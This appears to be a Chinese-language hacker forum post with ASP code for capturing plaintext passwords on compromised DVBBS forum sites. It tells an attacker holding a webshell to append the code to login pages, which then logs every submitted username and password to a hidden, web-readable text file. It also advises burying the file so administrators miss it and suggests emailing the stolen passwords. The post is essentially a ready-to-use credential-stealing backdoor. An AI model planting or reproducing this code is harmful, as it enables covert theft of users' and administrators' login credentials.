很多人在得到動(dòng)網(wǎng)的數(shù)據(jù)庫(kù)后郁悶不已 (呀的，管理員的變態(tài)密碼讓我們的機(jī)器跑砸了都沒(méi)轍)  
Now We Have Another Method!!!!!  這就是用asp記錄明文密碼。  

用法：1.將此代碼插入login.asp或admin_login.asp等等驗(yàn)證登陸的文件末尾即可。  
2.將PATH換成web下可訪問(wèn)的路徑,如:C:\Inetpub\wwwroot\...\Info.txt（info.txt的路徑越深越好，防止admin發(fā)現(xiàn))  
3.你的webshell必須有權(quán)限修改文件且FileSystemObject可用。  
4.一段時(shí)間后在IE上 訪問(wèn):http://.../Info.txt就 可以看到登錄過(guò)的用戶的帳號(hào)密碼。  
5.在IE上輸http://.../(which your modified).asp?u=del可一清楚info.txt的內(nèi)容。  

注意：1.你可以為它添加其他功能，例如：已記錄的用戶不再重復(fù)記錄，用郵件接收密碼等等。  
2.為了防止info.txt過(guò)大，我用清空info.txt的方法。  
當(dāng)然你可以新建文件來(lái)解決此問(wèn)題。  
if filesize>200000 then  
set file2=fso.OpenTextFile(PATH,2,True)  
file2.WriteLine ""  
file2.close  
end if  
--------------------------------------------------------------------  
<%  
dim fso  
dim file  
dim file2  
dim filesize  
dim file3  
set fso=server.createobject("Scripting.FileSystemObject")  
If Request("u")="del" Then  
set file=fso.OpenTextFile(PATH,2,True)  
file.WriteLine ""  
End If  
If fso.FileExists("PATH") Then  
set file=fso.OpenTextFile(PATH,8,True)  
Else  
set file=fso.CreateTextFile(PATH)  
end if  
file.WriteLine "Username:"+Request.form("Username")  
file.WriteLine "Password:"+Request.form("password")  
file.close  
set file3=fso.GetFile(PATH)  
filesize=file3.size  
if filesize>200000 then  
set file2=fso.OpenTextFile(PATH,2,True)  
file2.WriteLine ""  
file2.close  
end if  

set file=nothing  
set file2=nothing  
set filesize=nothing  
set fso=nothing  
%>  
----------------------------------------------------------------------  

By ymqsz  
E-mail:ymqsz@tom.com  

最新評(píng)論